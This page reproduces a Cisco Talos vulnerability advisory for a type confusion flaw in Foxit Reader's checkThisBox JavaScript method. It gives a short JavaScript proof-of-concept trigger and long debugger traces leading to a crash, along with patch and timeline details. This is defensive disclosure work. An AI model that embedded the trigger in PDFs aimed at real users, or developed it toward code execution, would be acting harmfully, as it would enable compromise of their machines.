Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-32664: TALOS-2023-1795 || Cisco Talos Intelligence Group

A type confusion vulnerability exists in the Javascript checkThisBox method as implemented in Foxit Reader 12.1.2.15332. A specially-crafted Javascript code inside a malicious PDF document can cause memory corruption and lead to remote code execution. User would need to open a malicious file to trigger the vulnerability.

CVE
#vulnerability#ios#cisco#js#java#intel#rce#pdf

SUMMARY

A type confusion vulnerability exists in the Javascript checkThisBox method as implemented in Foxit Reader 12.1.2.15332. A specially-crafted Javascript code inside a malicious PDF document can cause memory corruption and lead to remote code execution. User would need to open a malicious file to trigger the vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 12.1.2.15332

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

PDF Javascript API defines the checkThisBox method to check or uncheck widgets such as the check box or radio button. The first parameter (nWidget) of the method indicates the index of an individual widget. The second parameter is optional and the default value is true which checked the widget. There exists a type confusion when the checkThisBox method is called with an object of a different type rather than an Integer type. To demonstrate, the following code triggers this vulnerability:

function main() {
getField("Text Field1").setAction("Calculate",'f15();');
getField("Text Field1").setAction("Format",'f11();');
f11();

}

function f11(arg1, arg2, arg3) { 
app.activeDocs[0].deletePages();
app.fs.transitions;  
app.activeDocs[0].getField('Radio Button0').checkThisBox('a');

}

function f15(arg1, arg2, arg3) { 

event.value = 0; 

}

Note that the same vulnerability can be triggered with the defaultIsChecked method that takes nWidget as its first parameter. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
Breakpoint 0 hit
eax=006ae408 ebx=006ae474 ecx=02b96430 edx=00000000 esi=441ceff8 edi=31514ff8
eip=02e5e239 esp=006ae3e0 ebp=006ae420 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf79370 (02b96430)} ; [1]
0:000> g
Breakpoint 1 hit
eax=04cbcf48 ebx=31514f01 ecx=1cb96c54 edx=2998afe8 esi=105926e0 edi=1cb96c50
eip=01bae4c7 esp=006ae2a8 ebp=006ae2b8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7147:
01bae4c7 56              push    esi                                                    ;  [2]
0:000> dd esi
105926e0  00000002 00000000 23225680 105925c0
105926f0  00000000 232338e8 00000001 00000001
10592700  00000000 00000004 00000000 00000000
10592710  00000006 00000000 0000002a 00000000
10592720  00000000 10594560 00000010 0000000c
10592730  10595f5c 10595f38 0000000a 00000000
10592740  00010106 10592710 00000000 00000000
10592750  00000000 105945a0 00000010 00000002
0:000> u
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7147:
01bae4c7 56              push    esi
01bae4c8 ff5060          call    dword ptr [eax+60h]                                    ; [3]
01bae4cb 8bd8            mov     ebx,eax
01bae4cd 85db            test    ebx,ebx
01bae4cf 7808            js      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7159 (01bae4d9)
01bae4d1 56              push    esi
01bae4d2 8bcf            mov     ecx,edi
01bae4d4 e827ee0000      call    FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f80 (01bbd300)


0:000> ba w4 105926e0+0xC                                                               ; [4]
0:000> g
Breakpoint 0 hit
eax=006ad9e8 ebx=006ada54 ecx=02b30420 edx=00000000 esi=4ac88ff8 edi=4ac86ff8
eip=02e5e239 esp=006ad9c0 ebp=006ada00 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf13360 (02b30420)}
0:000> g                                     
Breakpoint 5 hit                                                                             ; [5]
eax=0000001f ebx=04c40a58 ecx=00000007 edx=62626952 esi=04c40a58 edi=105926ec
eip=04519e0b esp=006ad77c ebp=006ad7a0 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200203
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6db:
04519e0b 83c704          add     edi,4
0:000> dd 105926e0  
105926e0  00000001 0000001f 0000001f 62626952                                            
105926f0  00000000 232338e8 00000000 00000001
10592700  00000000 00000004 00000000 00000000
10592710  00000006 00000000 0000002a 00000000
10592720  00000000 10594560 00000010 0000000c
10592730  10595f5c 10595f38 0000000a 00000000
10592740  00010106 10592710 00000000 00000000
10592750  00000000 105945a0 00000010 00000002
0:000> da 105926ec  
105926ec  "Ribb"
0:000> kb L3
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ad7a0 011ba996     04c40a58 ffffffff 105926e0 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6db
01 006ad7d4 011b9b65     1471ada0 006ad7b0 00000014 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x4100f6
02 006ad7e8 011b82be     1471ada0 006ad814 00adcc1b FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x40f2c5
0:000> g
Breakpoint 5 hit                                                                             ; [6]
eax=2a75eff2 ebx=1c758fa0 ecx=00000022 edx=00000001 esi=2a75efd0 edi=105926ec
eip=04519ded esp=006ad6f8 ebp=006ad718 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6bd:
04519ded f30f7f4f10      movdqu  xmmword ptr [edi+10h],xmm1 ds:002b:105926fc=00736e6f6974704f6e61635374736f50  
0:000> dd 105926e0                                       
105926e0  00000001 00000011 00000011 006f0048 
105926f0  00690072 006f007a 0074006e 74736f50
10592700  6e616353 6974704f 00736e6f 00000000
10592710  00000006 00000000 0000002a 00000000
10592720  00000000 10594560 00000010 0000000c
10592730  10595f5c 10595f38 0000000a 00000000
10592740  00010106 10592710 00000000 00000000
10592750  00000000 105945a0 00000010 00000002
0:000> du 105926e0+0xc  
105926ec  "Horizont潐瑳捓湡灏楴湯s"
0:000> kb L3
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ad718 0214ae48     00000011 2a75efd0 23233ba8 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6bd
01 006ad730 01cfd04e     2a75efd0 006ad758 6b2f6f34 FoxitPDFReader!safe_vsnprintf+0x52dd88
02 006ad73c 6b2f6f34     23233ba8 2a75efd0 00000000 FoxitPDFReader!safe_vsnprintf+0xdff8e
0:000> g
Breakpoint 0 hit
eax=006ad9e0 ebx=006ada4c ecx=02b32520 edx=00000000 esi=33d8aff8 edi=33d88ff8
eip=02e5e239 esp=006ad9b8 ebp=006ad9f8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1            call    ecx {FoxitPDFReader!safe_vsnprintf+0xf15460 (02b32520)}
0:000> g
Breakpoint 2 hit
eax=10592860 ebx=00000001 ecx=1cb96c50 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd319 esp=006ae15c ebp=006ae170 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f99:
01bbd319 8bc8            mov     ecx,eax
0:000> g
Breakpoint 2 hit
eax=105926e0 ebx=0074006e ecx=1cb96c50 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd319 esp=006ae28c ebp=006ae2a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f99:
01bbd319 8bc8            mov     ecx,eax                                                   ; [7]
0:000> dd eax
105926e0  00000001 00000011 00000011 006f0048
105926f0  00690072 006f007a 0074006e 006c0061
10592700  00490020 0077006e 00720061 00000064
10592710  00000006 00000000 0000002a 00000000
10592720  00000000 10594560 00000010 0000000c
10592730  10595f5c 10595f38 0000000a 00000000
10592740  00010106 10592710 00000000 00000000
10592750  00000000 105945a0 00000010 00000002
0:000> du 105926e0+0xc  
105926ec  "Horizontal Inward"
0:000> p
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd31b esp=006ae28c ebp=006ae2a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f9b:
01bbd31b e8e0db3a00      call    FoxitPDFReader!safe_vsnprintf+0x34de40 (01f6af00)           ; [8]
0:000> t
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af00 esp=006ae288 ebp=006ae2a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de40:
01f6af00 55              push    ebp
0:000> p
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af01 esp=006ae284 ebp=006ae2a0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de41:
01f6af01 8bec            mov     ebp,esp
0:000> 
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af03 esp=006ae284 ebp=006ae284 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de43:
01f6af03 8b5508          mov     edx,dword ptr [ebp+8] ss:002b:006ae28c=00000000
0:000> 
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af06 esp=006ae284 ebp=006ae284 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de46:
01f6af06 85d2            test    edx,edx
0:000> 
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af08 esp=006ae284 ebp=006ae284 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x34de48:
01f6af08 7817            js      FoxitPDFReader!safe_vsnprintf+0x34de61 (01f6af21) [br=0]
0:000> 
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0a esp=006ae284 ebp=006ae284 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
FoxitPDFReader!safe_vsnprintf+0x34de4a:
01f6af0a 3b5118          cmp     edx,dword ptr [ecx+18h] ds:002b:105926f8=0074006e
0:000> 
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0d esp=006ae284 ebp=006ae284 iopl=0         nv up ei ng nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de4d:
01f6af0d 7d12            jge     FoxitPDFReader!safe_vsnprintf+0x34de61 (01f6af21) [br=0]
0:000> 
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0f esp=006ae284 ebp=006ae284 iopl=0         nv up ei ng nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de4f:
01f6af0f 83c110          add     ecx,10h
0:000> 
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af12 esp=006ae284 ebp=006ae284 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!safe_vsnprintf+0x34de52:
01f6af12 3b5108          cmp     edx,dword ptr [ecx+8] ds:002b:105926f8=0074006e
0:000> 
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af15 esp=006ae284 ebp=006ae284 iopl=0         nv up ei ng nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de55:
01f6af15 7d10            jge     FoxitPDFReader!safe_vsnprintf+0x34de67 (01f6af27) [br=0]
0:000> 
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af17 esp=006ae284 ebp=006ae284 iopl=0         nv up ei ng nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de57:
01f6af17 8b4104          mov     eax,dword ptr [ecx+4] ds:002b:105926f4=006f007a
0:000> 
eax=006f007a ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af1a esp=006ae284 ebp=006ae284 iopl=0         nv up ei ng nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de5a:
01f6af1a 8b0490          mov     eax,dword ptr [eax+edx*4] ds:002b:006f007a=3f3f3f3f       ; [9]
dd 006f007a
006f007a  3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f008a  3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f009a  3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00aa  3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00ba  3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00ca  3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f

At [1], the Field.checkThisBox method is called which eventually calls a method at [3]. The pointer passed as an argument to the method is examined at [2]. A breakpoint is set on write access of the memory pointed to by the pointer at [4]. The breakpoint was hit at [5] and [6] where the pointer is confused as a string object and a string object is written to it. This causes type confusion condition. Later at [7], the vulnerable pointer is passed as this argument to the method [8] where it is dereferenced. Here the crash didn’t occur as the arbitrary memory ([9]) is allocated and contains the value 0x3f3f3f3f. The crash occurs later in the code when the memory pointed to by 0x3f3f3f3f is dereferenced. This can be observed in a debugger at the time of the crash:

0:000> 
eax=2998afe8 ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75db esp=006ae240 ebp=006ae280 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025b:
01bb75db 8b4508          mov     eax,dword ptr [ebp+8] ss:002b:006ae288=3f3f3f3f
0:000> 
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808          mov     edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000> 
(1544.1cd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808          mov     edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000> dd 3f3f3f47
3f3f3f47  ???????? ???????? ???????? ????????
3f3f3f57  ???????? ???????? ???????? ????????
3f3f3f67  ???????? ???????? ???????? ????????
3f3f3f77  ???????? ???????? ???????? ????????
3f3f3f87  ???????? ???????? ???????? ????????
3f3f3f97  ???????? ???????? ???????? ????????
3f3f3fa7  ???????? ???????? ???????? ????????
3f3f3fb7  ???????? ???????? ???????? ????????
0:000> g
(1544.1cd4): Access violation - code c0000005 (!!! second chance !!!)
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808          mov     edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????

0:000> u
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808          mov     edi,dword ptr [eax+8]
01bb75e1 8b4308          mov     eax,dword ptr [ebx+8]
01bb75e4 897de8          mov     dword ptr [ebp-18h],edi
01bb75e7 85c0            test    eax,eax
01bb75e9 7404            je      FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f026f (01bb75ef)
01bb75eb 8b08            mov     ecx,dword ptr [eax]
01bb75ed eb02            jmp     FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f0271 (01bb75f1)
01bb75ef 33c9            xor     ecx,ecx


0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ae280 01bbd32a     3f3f3f3f 00000001 1cb96c50 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e
01 006ae2a0 01bae4d9     105926e0 1421ef01 105926e0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5faa
02 006ae2b8 01f6a085     105926e0 006ae2d8 ea3b87ec FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7159
03 006ae328 02bb96c8     00000000 1421ef01 00000001 FoxitPDFReader!safe_vsnprintf+0x34cfc5
04 006ae384 02b96582     1421eff8 00000001 006ae3ac FoxitPDFReader!safe_vsnprintf+0xf9c608
05 006ae3d8 02e5e23b     1421eff8 006ae408 006ae400 FoxitPDFReader!safe_vsnprintf+0xf794c2
06 006ae420 030425ab     4ba77600 4f4ecf71 4ba77600 FoxitPDFReader!FXJSE_GetClass+0x26b
07 006ae488 03041d6e     006ae4d0 4f4ecf71 006ae5ac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3c9b
08 006ae51c 03042025     006ae54c 4ba77600 006ae5ac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e345e
09 006ae564 03041eab     006ae57c 00000006 006ae5bc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3715
0a 006ae580 0326432b     00000006 006ae5bc 4ba77600 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e359b
0b 006ae5a0 03200389     3fb82339 4f4ed7d5 0000000c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x405a1b
0c 006ae5e4 03200389     4f4feb6d 3fb82339 3fb82339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0d 006ae620 03200389     4f4feb6d 4f551e41 4f551ea5 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0e 006ae64c 031fea10     4f4feb6d 3fb821b1 4f551e41 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0f 006ae664 031fe839     00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a0100
10 006ae690 02e9aa8e     4ba77600 3fb82339 4f551e41 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39ff29
11 006ae7a0 02e9a5a2     006ae934 4ba77600 006ae7fc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c17e
12 006ae828 02e832a4     006ae934 4ba77600 44937024 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc92
13 006ae9d8 02e82da0     006aea74 44937050 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
14 006ae9ec 02e5c7af     006aea74 44937050 ea3b8ea0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
15 006aea64 02e5d0e6     44937024 44930ff8 44937010 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
16 006aeaa0 02ad4a14     366e8fd8 0d2d84f4 44930ff8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
17 006aeb04 02ad5900     00000000 006aeb90 006aeb38 FoxitPDFReader!safe_vsnprintf+0xeb7954
18 006aeb18 0107119d     006aeb90 006aeb38 ea3b8f8c FoxitPDFReader!safe_vsnprintf+0xeb8840
19 006aeb48 01070064     2a62ef40 00000015 006aeb70 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c68fd
1a 006aeb88 0106eae0     232b2660 1471ada0 3d640fb8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c57c4
1b 006aebdc 0099a522     006aec0c 1471ada0 3d640fb8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c4240
1c 006aec2c 00bf76db     00000000 ea3b9c94 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8a02
1d 006af850 042ad52b     00000000 00000000 ea3b9de4 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x64bcb
1e 006af920 042ae704     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d0dfb
1f 006af944 042a90aa     00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d1fd4
20 006af9b8 042a991d     44f90e20 002b0330 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cc97a
21 006af9d8 76dd23a3     002b0330 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cd1ed
22 006afa04 76dc30b6     042a98e9 002b0330 00000429 USER32!_InternalCallWinProc+0x2b
23 006afafc 76dc1975     042a98e9 00000000 00000429 USER32!UserCallWinProcCheckWow+0x4c6
24 006afb78 76dc14c0     00000429 006afba0 00b7d3c4 USER32!DispatchMessageWorker+0x4a5
25 006afb84 00b7d3c4     0f43eec8 0f43eec8 06117798 USER32!DispatchMessageW+0x10
26 006afba0 00b7d483     06117798 00b7d3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
27 006afbc0 046cb2fe     00000000 06143b14 077b8000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
28 006afbd8 04490cc0     00760000 00000000 0c194360 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5eebce
29 006afc24 75f67d59     077b8000 75f67d40 006afc8c FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4590
2a 006afc34 772fb74b     077b8000 afc13d74 00000000 KERNEL32!BaseThreadInitThunk+0x19
2b 006afc8c 772fb6cf     ffffffff 7732867c 00000000 ntdll!__RtlUserThreadStart+0x2b
2c 006afc9c 00000000     04490d8f 077b8000 00000000 ntdll!_RtlUserThreadStart+0x1b

In the above debugger output, the value of eax is 0x3f3f3f3f that we got it from the type confused pointer. The crash occurs when eax is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access which could ultimately be abused to achieve arbitrary code execution.

VENDOR RESPONSE

Foxit provided patches here: https://www.foxit.com/downloads/#Foxit-Reader/ and here: https://www.foxit.com/downloads/#Foxit-PhantomPDF-Business/

TIMELINE

2023-07-03 - Vendor Disclosure
2023-07-19 - Vendor Patch Release
2023-07-19 - Public Release

Discovered by Kamlapati Choubey and Aleksandar Nikolic of Cisco Talos.

Related news

CVE-2023-41257: TALOS-2023-1838 || Cisco Talos Intelligence Group

A type confusion vulnerability exists in the way Foxit Reader 12.1.2.15356 handles field value properties. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

Out-of-bounds write vulnerabilities in popular chemistry software; Foxit PDF Reader issues could lead to remote code execution

Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907